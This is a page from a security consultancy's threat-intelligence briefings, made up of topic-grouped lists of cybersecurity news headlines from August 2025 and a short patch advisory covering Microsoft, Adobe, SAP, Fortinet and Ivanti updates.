Commander of Polish Cyberspace Defense Forces: we are in our conflict phase

Russia's RomCom among those exploiting a WinRAR 0-day • The Register

Finland charges tanker crew members with sabotage of undersea cables | Finland | The Guardian

REvil Actor Accuses Russia of Planning 2021 Kaseya Attack

Russia said to be behind US Federal Court systems hack | Cybernews

Norway spy chief blames Russian hackers for dam sabotage in April | Reuters

North Korea

North Korean Kimsuky hackers exposed in alleged data breach

Hackers breach and expose a major North Korean spying operation | TechCrunch

Researchers identify Chinese cybercriminal working for North Korean threat group | NK News

North Korean network breached, hackers claim - Washington Times

North Korea Attacks South Koreans With Ransomware

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Torture Victim’s Landmark Hacking Lawsuit Against Spyware Maker Can Proceed, Judge Rules | Electronic Frontier Foundation

EU law to protect journalists from spyware takes effect | The Record from Recorded Future News

Tools and Controls

CISOs face a complex tangle of tools, threats, and AI uncertainty - Help Net Security

The human firewall: Building a cyber-aware workforce

Don't stop at basic protections; make ongoing training a priority | TechRadar

Ransomware crews don't care about your EDR • The Register

Pentesting is now central to CISO strategy - Help Net Security

Microsoft: An organization without a response plan will be hit harder by a security incident | CyberScoop

UK proxy traffic surges as users consider VPN alternatives • The Register

Cyber insurance market shows early signs of maturity - Help Net Security

Crypto24 ransomware hits large orgs with custom EDR evasion tool

Navigating the Cybersecurity Budget Tug-of-War

Black Hat/DEF CON: AI more useful for defense than hacking • The Register

Why DNS threats should be on every CISO's radar in 2025 - Help Net Security

Attack yourself first: the logic behind offensive security | TechRadar

I am a chief security officer and here's why I think AI Cybersecurity has only itself to blame for the huge problem that's coming | TechRadar

How Insurers Use Threat Intelligence to Reduce Losses

FIDO authentication undermined | CSO Online

Deepfake detectors are coming of age, at a time of dire need • The Register

WhatsApp Bans 6.8M Scam Accounts in Southeast Asia with AI Tools

What Is the Three Lines Model and What Is Its Purpose? | Definition From TechTarget

UK Red Teamers “Deeply Skeptical” of AI - Infosecurity Magazine

What is DMARC and why it could prevent your organization from being hacked by cybercriminals | TechRadar

Your Internet, their rules: How DNS blocking shapes what we see online

Porn site traffic plummets as UK age verification rules enforced - BBC News

UK traffic to popular porn sites slumps after age checks introduced | Internet safety | The Guardian

Professional services firms stuck in network security IT doom loop | Computer Weekly

The rising need for offensive security strategy and skill | SC Media

Reports Published in the Last Week

When Theft Replaces Encryption: Blue Report 2025 on Ransomware & Infostealers

Other News

6 ways hackers hide their tracks | CSO Online

Threat actors move to smaller more persistent attacks - BetaNews

Mastering control of sovereign digital resilience | Computer Weekly

I am a cybersecurity strategist, and here's why businesses need a new cyber defense playbook | TechRadar

What happens when cyber attacks break more than just networks? | Insurance Business America

Everything You Should Know About Wi-Fi Jammers and Your Home Security - CNET

Ex-NSA Chief Paul Nakasone Has a Warning for the Tech World | WIRED

South Korea’s Yes24 ticketing platform hit by cyber attack - TheTicketingBusiness News

Vulnerability Management

Microsoft Sued For Killing Windows 10—All Users Must Act Now

Windows 11 23H2 Home and Pro reach end of support in November

Researchers determine old vulnerabilities pose real-world threat to sensitive data in public clouds | CyberScoop

CISA pledges to continue backing CVE Program after April funding fiasco | The Record from Recorded Future News

Vulnerabilities

Russia's RomCom among those exploiting a WinRAR 0-day • The Register

WinRAR has a serious security flaw - worrying zero-day issue lets hackers plant malware, so patch right away | TechRadar

Over 29,000 Exchange servers unpatched against high-severity flaw

Microsoft August 2025 Patch Tuesday Fixes Kerberos Zero-Day Among 111 Total New Flaws

Over 3,000 NetScaler devices left unpatched against CitrixBleed 2 bug

Zoom patches critical Windows flaw allowing privilege escalation

Active attacks target Office vuln patched 8 years ago • The Register

Spike in Fortinet VPN brute-force attacks raises zero-day concerns

Cisco Warns of CVSS 10.0 FMC RADIUS Flaw Allowing Remote Code Execution

FortiWeb Authentication Bypass Vulnerability Let Attackers Log in As Any Existing User

Windows Remote Desktop Services Vulnerability Let Attacker Deny Services Over Network

BitUnlocker - Multiple 0-days to Bypass BitLocker and Extract All Protected Data

Critical SSH vulnerabilities expose enterprise network infrastructure as patching lags | Network World

New Active Directory Lateral Movement Techniques that Bypasses Authentication and Exfiltrate Data

New Win-DDoS Flaws Let Attackers Turn Public Domain Controllers into DDoS Botnet via RPC, LDAP

'MadeYouReset' HTTP2 Vulnerability Enables Massive DDoS Attacks - SecurityWeek

Red Teams Jailbreak GPT-5 With Ease, Warn It's ‘Nearly Unusable’ for Enterprise - SecurityWeek

Prompt injection vuln found in Google Gemini apps • The Register

Akira Ransomware Exploits SonicWall Zero-Day with BYOVD Evasion

Windows Hello for Business Flaw Could Allow Unauthorized Access

WinRAR Zero-Day Under Active Exploitation – Update to Latest Version Immediately

Microsoft Entra OAuth Flaw Exposed Internal Apps to Unauthorized Access

SonicWall pins firewall attack spree on year-old vulnerability | CyberScoop

Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs

Fortinet, Ivanti Release August 2025 Security Patches - SecurityWeek

Critical FortiSIEM Vulnerability Let Attackers to Execute Malicious Commands - PoC Found in Wild

Fortinet SSL VPNs Hit by Global Brute-Force Wave Before Attackers Shift to FortiManager

Vulnerabilities in MSP-friendly RMM solution exploited in the wild (CVE-2025-8875, CVE-2025-8876) - Help Net Security

Hackers reportedly compromise Canadian House of Commons through Microsoft vulnerability | The Record from Recorded Future News

New Linux Kernel Vulnerability Directly Exploited from Chrome Renderer Sandbox

7-Zip Arbitrary File Write Vulnerability Let Attackers Execute Arbitrary Code

Trend Micro reports two critical CVEs under active exploit • The Register

Chipmaker Patch Tuesday: Many Vulnerabilities Addressed by Intel, AMD, Nvidia - SecurityWeek

Vulnerabilities in Xerox Print Orchestration Product Allow Remote Code Execution - SecurityWeek

How a chain of security flaws exposed thousands of enterprise surveillance cameras to remote code execution - TechTalks

Hackers Could Gain Full Control of Your Rooted Android Devices by Exploiting One Vulnerability

Croatian research institute confirms ransomware attack via ToolShell vulnerabilities - Help Net Security

SAP fixed 26 flaws in August 2025 Update, including 4 Critical

Researchers Spot XZ Utils Backdoor in Dozens of Docker Hub Images, Fueling Supply Chain Risks

Flaws in a pair of Grafana plugins could hand over DevOps control | CSO Online

New TETRA Radio Encryption Flaws Expose Law Enforcement Communications

KernelSU v0.5.7 Flaw Lets Android Apps Gain Root Access - Infosecurity Magazine

Matrix admits 'high severity' flaws need breaking fixes • The Register

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 13/08/2025 Black Arrow Admin 13/08/2025

Black Arrow Cyber Advisory - 13 August 2025 - Security Updates from Microsoft, Adobe, SAP, Fortinet and Ivanti

Black Arrow Cyber Advisory 13 August 2025 - Security Updates from Microsoft, Adobe, SAP, Fortinet and Ivanti

Executive Summary

August’s Patch Tuesday delivers substantial updates across enterprise platforms. Microsoft addresses 107 vulnerabilities—including one zero-day and 13 critical flaws—spanning Windows, Office, and server products. Adobe issues multiple bulletins for Commerce, InCopy, and FrameMaker. SAP releases 15 Security Notes for enterprise systems. Fortinet publishes critical advisories for Security Fabric, FGFM, and SSL-VPN components. Ivanti provides three updates for its secure gateway products. Immediate patching is advised, particularly for critical RCE and privilege-escalation vulnerabilities.

Vulnerabilities by Vendor

Microsoft[¹]: 107 vulnerabilities addressed, including one publicly disclosed zero-day and 13 critical flaws. Patching is advised across Windows, Office, SQL Server, and other widespread components.
Adobe[²]: At least 19 vulnerabilities in Adobe Commerce, InCopy, and FrameMaker. Focus should be on critical arbitrary code execution fixes.
SAP[³]: 15 Security Notes affecting S/4HANA, Business Suite, and other SAP platforms. HotNews and high-priority advisories should be applied first.
Fortinet[⁴]: Three advisories dated 12 August 2025—covering Security Fabric privilege issues, FGFM authentication weaknesses (in FortiOS/FortiProxy/FortiPAM), and an SSL-VPN integer-overflow DoS vulnerability.
Ivanti[⁵]: Three product-specific advisories on August Patch Tuesday — for Connect Secure, Policy Secure, and ZTA Gateways — focused on gateway access and authentication security.

What’s the risk to me or my business?

The presence of actively exploited zero-days and critical RCE/privilege-escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.

What can I do?

Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation’s security policies and ensure that all systems are running supported and up-to-date software versions.

Footnotes:
¹ Microsoft — August 2025 Security Update Release Notes: https://msrc.microsoft.com/update-guide/releaseNote/2025-Aug
² Adobe — Adobe Product Security Bulletin: https://helpx.adobe.com/security/security-bulletin.html
³ SAP — SAP Security Patch Day August 2025: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2025.html
⁴ Fortinet Security Advisories: https://www.fortiguard.com/psirt
⁵ Ivanti August 2025 Security Advisory: https://forums.ivanti.com/s/article/August-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-Multiple-CVEs?language=en_US

Black Arrow Admin 10/08/2025 Black Arrow Admin 10/08/2025

Black Arrow Cyber Threat Intelligence Briefing 08 August 2025

Black Arrow Cyber Threat Intelligence Briefing 08 August 2025:

-AI Can Plan and Execute Cyber Attacks Without Human Intervention

-Ransomware Gangs Attacking Managed Service Providers with Stolen Login Credentials and Vulnerabilities

-Hackers Uses Social Engineering Attack to Gain Remote Access in 5 Minutes

-Social Engineering Attacks Surged This Past Year

-Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration

-Cyber Criminals Are Getting Personal, and It’s Working

-Ransomware Victims Are Still Paying Up, Some More Than Once

-SMBs Struggle with Alert Overload, Cloud Blind Spots and Insider Threats

-Britons Face Cyber-Attack Surge as UK Becomes Most Targeted Country in Europe

-Exposed Without a Breach - The Cost of Data Blindness

-Cyber Insurance Premiums Are Soaring — And So Are Your Risks

Executive Summary

This week, we start with insights into the evolving tactics of attackers. A study has shown how AI can plan and execute complex cyber attacks without human intervention, while other attackers are using stolen credentials and vulnerabilities to gain access to managed service providers. Social engineering attacks have surged over the past year, with attackers able to access their target’s corporate systems within 5 minutes. Once they are in, the attackers are expanding their tactics beyond encryption and exfiltration, and victims continue to pay the ransom demands.

We also report that the UK is third most targeted country globally, behind the US and Canada, and we highlight the challenges facing small and medium sized business in particular. We also highlight that cyber incidents do not only happen as part of an attack; they also occur when data is vulnerable due to mismanaged systems and accesses. As all these risks increase, we also highlight the potential value of cyber insurance as part of a robust and planned cyber security strategy

Governance, Risk and Compliance

Britons face cyber-attack surge as UK becomes most targeted country in Europe | Engineering and Technology Magazine

CISOs say they're prepared, their data says otherwise - Help Net Security

Why 90% of cyber leaders are feeling the heat - Help Net Security

Cybersecurity must be a top priority for businesses from beginning to end | TechRadar

Mind the overconfidence gap: CISOs and staff don’t see eye to eye on security posture | CSO Online

75 percent of cybersecurity leaders don’t trust their own data - BetaNews

The Heat Wasn't Just Outside: Cyber Attacks Spiked in Summer 2025

Summer: Why cybersecurity must be strengthened as vacations abound | CSO Online

Cybersecurity Incident Response Needs A War Room, Not A Playbook

Prioritizing Cybersecurity: Essential for Business Survival Against AI Threats

Stronger together: the secret to enduring cyber resilience lies in IT-security collaboration | TechRadar

Threats

Ransomware, Extortion and Destructive Attacks

Nearly one-third of ransomware victims are hit multiple times, even after paying hackers | IT Pro

Akira and Lynx Ransomware Attacking Managed Service Providers With Stolen Login Credential and Vulnerabilities

New EDR killer tool used by eight different ransomware groups

Britons face cyber-attack surge as UK becomes most targeted country in Europe | Engineering and Technology Magazine

Ransomware groups shift to quadruple extortion to maximize pressure - Help Net Security

75% of UK business leaders are willing to risk criminal penalties to pay ransoms | IT Pro

Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security

Ransomware goes cloud native to target your backup infrastructure | CSO Online

Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration - Infosecurity Magazine

On the Rise: Ransomware Victims, Breaches, Infostealers

This devious ransomware is able to hijack your system to turn off Microsoft Defender | TechRadar

Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices

Ransomware Surges as Attempts Spike 146%

Nimble 'Gunra' Ransomware Evolves With Linux Variant

Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks

Ransomware gangs join attacks targeting Microsoft SharePoint servers

Study: 78% of Companies Targeted with Ransomware

Ransomware-as-a-Service Economy - Trends, Targets & Takedowns

Ransomware attacks: The evolving extortion threat to US financial institutions | CSO Online

Akira ransomware abuses CPU tuning tool to disable Microsoft Defender

Royal and BlackSuit ransomware gangs hit over 450 US companies

Qilin Ransomware Affiliate Panel Login Credentials Exposed Online – DataBreaches.Net

SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others

Countering the Threat of Ransomware as a Service

Why we shouldn’t just repeat ransomware groups’ claims, Sunday edition – DataBreaches.Net

Authorities seize BlackSuit ransomware gang's servers | TechCrunch

Ransomware Victims

Ransomware attacks cripple government services across Dutch Caribbean islands | NL Times

Ransomware plunges insurance company into bankruptcy | Fortra

SBM investigates alleged cyber incident amid claims of reputational threat - NEWS.MC - Monaco News

More than 1 million patients affected by DaVita ransomware attack; those are preliminary numbers – DataBreaches.Net

Highlands Oncology Group notifies 113,575 people after ransomware attack by Medusa – DataBreaches.Net

Phishing & Email Based Attacks

Cybercriminals are getting personal, and it's working - Help Net Security

Attackers exploit link-wrapping services to steal Microsoft 365 logins

Cybercriminals Abandon Tech Tricks for Personalized Deception Tactics, VIPRE's Q2 2025 Email Threat Report Reveals

Phishers Abuse M365 'Direct Send' to Spoof Internal Users

Mozilla warns Firefox add-on devs of new phishing attacks • The Register

Other Social Engineering

Cybercriminals are getting personal, and it's working - Help Net Security

Social engineering attacks surged this past year, Palo Alto Networks report finds | CyberScoop

Hackers Uses Social Engineering Attack to Gain Remote Access in 300 Seconds

Cybercriminals Abandon Tech Tricks for Personalized Deception Tactics, VIPRE's Q2 2025 Email Threat Report Reveals

Gen Z in the Crosshairs: Cybercriminals Shift Focus to Young, Digital-Savvy Workers - SecurityWeek

QR Code Quishing Attacks Surge 50%: Protect Against Data Theft

Security expert warns: don't list defense work on LinkedIn - or you could be at risk of getting hacked | TechRadar

CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop

North Korean IT worker infiltrations exploded 220% over the past 12 months, with GenAI weaponized at every stage of the hiring process | Fortune

15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign

Cisco Victim of Voice Phishing Attack, Customer Data Stolen

How not to hire a North Korean IT spy | CSO Online

Indeed recruiter text scam: I responded to one of the “job” messages. It got weird quickly.

Hackers using fake summonses in attacks on Ukraine's defense sector | The Record from Recorded Future News

Fraud, Scams and Financial Crime

Thousands duped by fake pharmacy websites using AI tricks, crypto payments, and fake reviews to push unsafe drugs | TechRadar

Experts Alarmed by UK Government’s Companies House ID Checks - Infosecurity Magazine

Scammers abusing WhatsApp group invites | Cybernews

Fraud controls don’t guarantee consumer trust - Help Net Security

Indeed recruiter text scam: I responded to one of the “job” messages. It got weird quickly.

AI Fuels Record Number of Fraud Cases - Infosecurity Magazine

Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop

Artificial Intelligence

9 things you shouldn't use AI for at work | ZDNET

Your employees uploaded over a gig of files to GenAI tools last quarter - Help Net Security

CrowdStrike: Threat Actors Increasingly Lean on AI Tools

15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign

Russian Cyber Threat Group Uses AI-Guided Malware

This AI didn’t just simulate an attack - it planned and executed a real breach like a human hacker | TechRadar

Financial sector faced most AI-powered cyberattacks: survey

Rising Mobile Browser Attacks: AI Threats and Key Defenses

AI Guardrails Under Fire: Cisco's Jailbreak Demo Exposes AI Weak Points - SecurityWeek

Cybersecurity Pros Say IoT, Large Language Models Are Risk Areas of Concern

AI can write your code, but nearly half of it may be insecure - Help Net Security

The Day Everything Changed: A CISO’s Perspective on the Carnegie Mellon AI Hacking Study | MSSP Alert

Security Researchers Just Hacked ChatGPT Using A Single 'Poisoned' Document

Thousands duped by fake pharmacy websites using AI tricks, crypto payments, and fake reviews to push unsafe drugs | TechRadar

AI Fuels Record Number of Fraud Cases - Infosecurity Magazine

Vibe Coding: When Everyone’s a Developer, Who Secures the Code? - SecurityWeek

NIST seeks to avoid reinventing the wheel with AI security guidance

Prioritizing Cybersecurity: Essential for Business Survival Against AI Threats

What's keeping risk leaders up at night? AI, tariffs, and cost cuts - Help Net Security

42% of Developers Using AI Say Their Codebase is Now Mostly AI-Generated

Anthropic wants to stop AI models from turning evil - here's how | ZDNET

Claude Vulnerabilities Let Attackers Execute Unauthorized Commands With its Own Help

Gemini AI Promptware Attack Exploits Calendar Invites to Hijack Smart Homes

Malware

On the Rise: Ransomware Victims, Breaches, Infostealers

15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign

Russian Cyber Threat Group Uses AI-Guided Malware

SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others

Staggering 800% Rise in Infostealer Credential Theft - Infosecurity Magazine

New 'Shade BIOS' Technique Beats Every Kind of Security

New Undectable Plague Malware Attacking Linux Servers to Gain Persistent SSH Access

Antivirus vendors fail to spot persistent Linux backdoor • The Register

Python-powered malware grabs 200K passwords, credit cards • The Register

‘Highly evasive’ Vietnamese-speaking hackers stealing data from thousands of victims in 62+ nations | CyberScoop

Your browser’s tools can’t see what extensions are really doing - and hackers know it perfectly well | TechRadar

Dangerous new Linux malware strikes - thousands of users see passwords, personal info stolen, here's what we know | TechRadar

CISA releases malware analysis for Sharepoint Server attack • The Register

Fake WhatsApp developer libraries hide destructive data-wiping code

Wave of 150 crypto-draining extensions hits Firefox add-on store

CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign

Mobile

Rising Mobile Browser Attacks: AI Threats and Key Defenses

PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads

Google addresses six vulnerabilities in August’s Android security update | CyberScoop

PlayPraetor Android RAT expands rapidly across Spanish and French-speaking regions

Hackers are cracking mobile browsers to bypass security - here's how they do it and how to stay safe | TechRadar

France orders officials to drop foreign messaging apps over cybersecurity fears

Germany’s top court holds that police can only use spyware to investigate serious crimes | The Record from Recorded Future News

Internet of Things – IoT

Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security

Cybersecurity Pros Say IoT, Large Language Models Are Risk Areas of Concern

The humble printer highlights overlooked security flaws | CIO Dive

Gemini AI Promptware Attack Exploits Calendar Invites to Hijack Smart Homes

Data Breaches/Leaks

On the Rise: Ransomware Victims, Breaches, Infostealers

Legal aid cyber-attack has pushed sector towards collapse, say lawyers | Legal aid | The Guardian

Google says hackers stole its customers' data by breaching its Salesforce database | TechCrunch

Exposed Without a Breach: The Cost of Data Blindness

Cisco Victim of Voice Phishing Attack, Customer Data Stolen

Top MoD civil servant to leave in wake of Afghan data breach - BBC News

Average global data breach cost now $4.44 million - Help Net Security

Swipe Right for a Cyberattack: Dating Sites, EV Chargers, and Sex Toys

No, 16 Billion New User Credentials Weren’t Leaked—but the Risk Remains | Proofpoint US

Allianz faces fresh lawsuit as cyberattack exposes 1.4 million records | Insurance Business America

Bouygues Telecom Data Breach Exposes 6.4 Million Customer Records - Infosecurity Magazine

Air France and KLM disclosed data breaches following the hack of a third-party platform

Chanel and Pandora latest retailers to be hit by cyber attacks | Retail Week

Pandora confirms data breach amid ongoing Salesforce data theft attacks

More than 1 million patients affected by DaVita ransomware attack; those are preliminary numbers – DataBreaches.Net

Allianz Life cyberattack gets worse as company confirms Social Security numbers stolen | TechRadar

Sex toy maker Lovense threatens legal action after fixing security flaws that exposed users' data | TechCrunch

Lovense flaws expose emails and allow account takeover

PBS confirms data breach after employee info leaked on Discord servers

Despite data breaches like the Tea app, companies see little consequence - The Washington Post

TeaOnHer, a rival Tea app for men, is leaking users' personal data and driver's licenses | TechCrunch

Florida prison exposes visitor contact info to every inmate • The Register

Organised Crime & Criminal Actors

Cybercriminals are getting personal, and it's working - Help Net Security

Britons face cyber attack surge as UK becomes most targeted country in Europe | Engineering and Technology Magazine

Why the Old Ways Are Still the Best for Most Cybercriminals

From fake CAPTCHAs to RATs: Inside 2025's cyber deception threat trends - Help Net Security

Python-powered malware grabs 200K passwords, credit cards • The Register

Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally

‘Highly evasive’ Vietnamese-speaking hackers stealing data from thousands of victims in 62+ nations | CyberScoop

Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop

Countering the Threat of Ransomware as a Service

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign

Wave of 150 crypto-draining extensions hits Firefox add-on store

Thousands duped by fake pharmacy websites using AI tricks, crypto payments, and fake reviews to push unsafe drugs | TechRadar

Insider Risk and Insider Threats

Your employees uploaded over a gig of files to GenAI tools last quarter - Help Net Security

UK cyber resilience crisis deepens as SMBs struggle with alert overload, cloud blind spots and insider threats, reveals TrustLayer | Pressat

CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop

North Korean IT worker infiltrations exploded 220% over the past 12 months, with GenAI weaponized at every stage of the hiring process | Fortune

Ninety laptops, millions of dollars: US woman jailed over North Korea remote-work scam | US news | The Guardian

Laptop Farm: What It Is & How It's Used, Explained

How not to hire a North Korean IT spy | CSO Online

Insurance

Cyber Insurance Premiums Are Soaring — And So Are Your Risks - Above the Law

Supply Chain and Third Parties

Akira and Lynx Ransomware Attacking Managed Service Providers With Stolen Login Credential and Vulnerabilities

Air France and KLM disclosed data breaches following the hack of a third-party platform

Chanel and Pandora latest retailers to be hit by cyber attacks | Retail Week

Pandora confirms data breach amid ongoing Salesforce data theft attacks

Luxembourg probes reported attack on Huawei tech that caused nationwide telecoms outage | The Record from Recorded Future News

Cloud/SaaS

UK cyber resilience crisis deepens as SMBs struggle with alert overload, cloud blind spots and insider threats, reveals TrustLayer | Pressat

Google says hackers stole its customers' data by breaching its Salesforce database | TechCrunch

Attackers exploit link-wrapping services to steal Microsoft 365 logins

Ransomware goes cloud native to target your backup infrastructure | CSO Online

Phishers Abuse M365 'Direct Send' to Spoof Internal Users

How the UK's cloud strategy was hijacked by a hyperscaler duopoly | Computer Weekly

New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at - Infosecurity Magazine

Outages

Luxembourg probes reported attack on Huawei tech that caused nationwide telecoms outage | The Record from Recorded Future News

Identity and Access Management

Privilege Escalation Issue in Amazon ECS Leads to IAM Hijacking

Encryption

Encryption Made for Police and Military Radios May Be Easily Cracked | WIRED

Linux and Open Source

New Linux backdoor Plague bypasses auth via malicious PAM module

New Undectable Plague Malware Attacking Linux Servers to Gain Persistent SSH Access

Antivirus vendors fail to spot persistent Linux backdoor • The Register

New malware avoids antivirus detection, unleashes a "plague" on your devices | TechRadar

Dangerous new Linux malware strikes - thousands of users see passwords, personal info stolen, here's what we know | TechRadar

Nimble 'Gunra' Ransomware Evolves With Linux Variant

Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW

Russian, Chinese coders secretly insert malicious code in open-source software, says new report - Washington Times

Lansweeper finds Linux is growing on business endpoints • The Register

Yes, you need a firewall on Linux - here's why and which to use | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

Attackers exploit link-wrapping services to steal Microsoft 365 logins

Akira and Lynx Ransomware Attacking Managed Service Providers With Stolen Login Credential and Vulnerabilities

Python-powered malware grabs 200K passwords, credit cards • The Register

Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally

‘Highly evasive’ Vietnamese-speaking hackers stealing data from thousands of victims in 62+ nations | CyberScoop

Staggering 800% Rise in Infostealer Credential Theft - Infosecurity Magazine

Hackers Steal 1.8 Billion Credentials, 9 Billion Data Records

Social Media

15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign

Security expert warns: don't list defense work on LinkedIn - or you could be at risk of getting hacked | TechRadar

Amnesty slams X for 'central role' in fueling UK violence • The Register

Instagram lets you see your friends' locations now, and vice versa - here's how | ZDNET

Malvertising

PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads

SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others

Regulations, Fines and Legislation

Europe’s Cybersecurity Puzzle: NIS2 Progress in 30 Pieces | McDermott Will & Schulte - JDSupra

75% of UK business leaders are willing to risk criminal penalties to pay ransoms | IT Pro

The VPNs allowing youngsters to bypass UK age verification rules

'A disaster waiting to happen' — Cybersecurity experts react to UK age verification law | Tom's Guide

One Week of the Online Safety Act: Cyber Experts Weigh In - IT Security Guru

'Can I see some ID?' As online age verification spreads, so do privacy concerns | CBC News

Why do angry UK internet users want to repeal the Online Safety Act? Here are the 5 biggest complaints | TechRadar

Social media battles and barbs on both sides of Atlantic over UK Online Safety Act | Internet safety | The Guardian

The Cyber Security and Resilience Bill | Technology Law Dispatch

CISA, USCG make example out of organization they audited • The Register

Former and current officials clash over CISA’s role in US cyber defenses at Black Hat - Nextgov/FCW

Senate confirms national cyber director pick Sean Cairncross | CyberScoop

Annual ODPA report highlights local Data Law adequacy - Bailiwick Express News Guernsey

Illumina Settles Allegations of Cyber Vulnerabilities in Genomic Sequencing for $9.8M

Independent Cybersecurity Audits Will Be Required for ‘Significant Risk’ Under CCPA | Herbert Smith Freehills Kramer - JDSupra

America Is Blinding Itself - by Mark Hertling - The Bulwark

US Agencies Fail IT Security Audits, Jeopardizing National Security

DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional

Models, Frameworks and Standards

Europe’s Cybersecurity Puzzle: NIS2 Progress in 30 Pieces | McDermott Will & Schulte - JDSupra

The Cyber Security and Resilience Bill | Technology Law Dispatch

NIST seeks to avoid reinventing the wheel with AI security guidance

NCSC Updates Cyber Assessment Framework to Build UK CNI Resilience - Infosecurity Magazine

DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional

Careers, Working in Cyber and Information Security

How CISOs are training the next generation of cyber leaders | CSO Online

The Five Steps to Increase UK Cyber Resilience Detailed | SC Media UK

5 hard truths of a career in cybersecurity — and how to navigate them | CSO Online

Law Enforcement Action and Take Downs

Ninety laptops, millions of dollars: US woman jailed over North Korea remote-work scam | US news | The Guardian

Details emerge on BlackSuit ransomware takedown | CyberScoop

Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

NATO condemns Russian cyber activities

New Tallinn Paper analysis Russian cyber agression and proposes ways to strengthen Europe’s cyber defence

Europe must adapt to Russia's hybrid cyber war

Pro-Iran Hackers Aligned Cyber with Kinetic War Aims - Infosecurity Magazine

Iranian hackers were more coordinated, aligned during Israel conflict than it seemed | CyberScoop

DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional

CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign

Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan

Nation State Actors

China

Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW

Russian, Chinese coders secretly insert malicious code in open-source software, says new report - Washington Times

Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks

China’s botched Great Firewall upgrade invites attacks • The Register

Chinese Nation-State Hackers Breach Southeast Asian Telecoms

DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional

CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign

Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan

Why an explosive fight erupted over the UK's new Chinese embassy - BBC News

Microsoft flaw ‘opens the door’ for hackers. It will be hard to close | World Business | postguam.com

Chinese cyberattack on US nuclear agency highlights importance of cyber hygiene | The Strategist

Nvidia says its chips have no 'backdoors' after China raises concerns | Fox Business

China Says US Exploited Old Microsoft Flaw for Cyberattacks - Bloomberg

Russia

NATO condemns Russian cyber activities

New Tallinn Paper analysis Russian cyber agression and proposes ways to strengthen Europe’s cyber defence

Europe must adapt to Russia's hybrid cyber war

Russian, Chinese coders secretly insert malicious code in open-source software, says new report - Washington Times

Russian Cyber Threat Group Uses AI-Guided Malware

DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional

Hackers using fake summonses in attacks on Ukraine's defense sector | The Record from Recorded Future News

Ukrainian drone attacks are causing blackouts and shutdowns for Russian mobile internet | TechRadar

Iran

Pro-Iran Hackers Aligned Cyber with Kinetic War Aims - Infosecurity Magazine

Iranian hackers were more coordinated, aligned during Israel conflict than it seemed | CyberScoop

North Korea

Ninety laptops, millions of dollars: US woman jailed over North Korea remote-work scam | US news | The Guardian

CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop

North Korean IT worker infiltrations exploded 220% over the past 12 months, with GenAI weaponized at every stage of the hiring process | Fortune

